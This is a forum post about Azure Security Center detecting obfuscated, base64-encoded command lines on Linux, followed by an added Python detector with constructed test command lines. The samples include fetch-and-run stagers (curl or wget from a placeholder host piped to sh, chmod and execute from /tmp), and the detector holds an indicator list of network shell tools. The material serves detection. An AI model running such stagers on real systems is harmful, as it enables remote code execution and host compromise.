Forum Discussion

EricStarker
Former Employee
Jun 06, 2018

Detecting script-based attacks on Linux

Last month, we announced the extension of Azure Security Center’s detection for Linux. This post aims to demonstrate how existing Windows detections often have Linux analogs. A specific example of this is the encoding or obfuscation of command-lines.

Some of the reasons an attacker might wish to encode their commands include minimizing quoting/escaping issues when encapsulating commands in scripts and a basic means of hiding from host-based intrusion detection. These techniques have the additional benefit of avoiding the need to drop a file to disk, reducing the risk to an attacker of being detected by traditional anti-virus products.
Read about it in the Azure blog.
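
The following is an added worked example, not code from this post or from Azure Security Center's own detection logic: a small Python detector for the pattern the post describes (a base64 payload decoded on the command line and handed to a shell or interpreter), run over constructed Linux process-creation command lines. The decoder patterns, the execution-indicator list, the severity scheme and the sample command lines are all assumptions made for this example; the encoded payloads are generated inline so the sample runs offline and stays self-contained.

```python
import base64
import binascii
import re
import string
from dataclasses import dataclass
from typing import List, Optional

# Command-line fragments that decode base64 in place. This list is an
# assumption of the example, not a vendor rule set.
DECODER_RE = re.compile(
    r"\bbase64\s+(?:-d|-D|--decode)\b"             # GNU / BSD coreutils
    r"|\bb64decode\s*\("                            # python base64.b64decode(...)
    r"|\bopenssl\s+(?:enc|base64)\b[^|;]*\s-d\b"    # openssl enc -d ... / openssl base64 -d
)

# A run that looks like standard-alphabet base64, with optional '=' padding.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Tokens in a decoded payload that mean "fetch or execute something" (assumed list).
EXEC_INDICATORS = re.compile(
    r"\b(?:curl|wget|chmod|nohup|crontab|ncat|nc|bash|python3?|perl)\b"
    r"|/dev/tcp/|/bin/sh|os\.system|subprocess|\bexec\("
)


@dataclass
class Finding:
    cmdline: str          # the raw command line that fired
    decoded: str          # innermost decoded payload
    severity: str         # "high" if the payload carries an execution indicator, else "medium"
    indicators: List[str]


def try_decode_text(blob: str) -> Optional[str]:
    """Strictly decode a base64 candidate; return it only if it is readable text.

    Paths such as /var/log/something are alphabet-only runs and match BLOB_RE,
    so the padding and printability checks are what keep them from firing."""
    if len(blob) % 4:
        return None                       # real base64 is padded to a multiple of 4
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    printable = set(string.printable)
    if not text or sum(c in printable for c in text) / len(text) < 0.95:
        return None
    return text


def analyze(cmdline: str, max_depth: int = 3) -> Optional[Finding]:
    """Flag a command line that decodes an embedded base64 payload.

    A blob with no decoder on the line (for example a certificate fragment
    passed to a tool) is deliberately not reported: the decode step is the
    evidence of obfuscation, the blob alone is not."""
    if max_depth == 0 or not DECODER_RE.search(cmdline):
        return None
    for m in BLOB_RE.finditer(cmdline):
        text = try_decode_text(m.group(0))
        if text is None:
            continue
        # Attackers sometimes nest encodings; peel one layer at a time.
        inner = analyze(text, max_depth - 1)
        if inner is not None:
            text, hits = inner.decoded, inner.indicators
        else:
            hits = sorted(set(EXEC_INDICATORS.findall(text)))
        return Finding(cmdline, text, "high" if hits else "medium", hits)
    return None


def scan(cmdlines: List[str]) -> List[Finding]:
    """Run analyze() over a batch of process command lines and keep the hits."""
    return [f for f in (analyze(c) for c in cmdlines) if f is not None]


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample process-creation records (not captured from any real host).
STAGER = _b64("curl -fsSL http://example.invalid/x.sh | sh")
PY_PAYLOAD = _b64("import os;os.system('wget http://example.invalid/m -O /tmp/m')")
INNER = _b64("chmod +x /tmp/m && /tmp/m")
OUTER = _b64(f"echo {INNER} | base64 -d | sh")
BENIGN = _b64("Hello, world. Just a test string.")

SAMPLE_CMDLINES = [
    f"bash -c 'echo {STAGER} | base64 -d | sh'",                         # decode-and-pipe stager
    f"python3 -c \"import base64;exec(base64.b64decode('{PY_PAYLOAD}'))\"",  # interpreter one-liner
    f"sh -c 'echo {OUTER} | base64 -d | sh'",                            # two layers of encoding
    f"echo {BENIGN} | base64 -d",                                        # decoder, harmless payload
    "tar czf /var/backups/nightly.tgz /var/log/applicationserver",       # no decoder: must not fire
    "cat /etc/ssl/certs/ca-certificates.crt | base64 -d",                # decoder, but no valid blob
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.severity}] {f.indicators} <- {f.decoded!r}")
```

Two of the constructed lines show the main false-positive trap: long alphabet-only runs such as paths match a base64 regex, so the example insists on correct padding, strict decoding and printable output before it believes a blob, and it ignores blobs with no decoder on the same line. Real pipelines would feed this from auditd or eBPF execve records and would also need to cover the URL-safe base64 alphabet, hex via `xxd -r -p`, and `printf` escape sequences, none of which the patterns above catch.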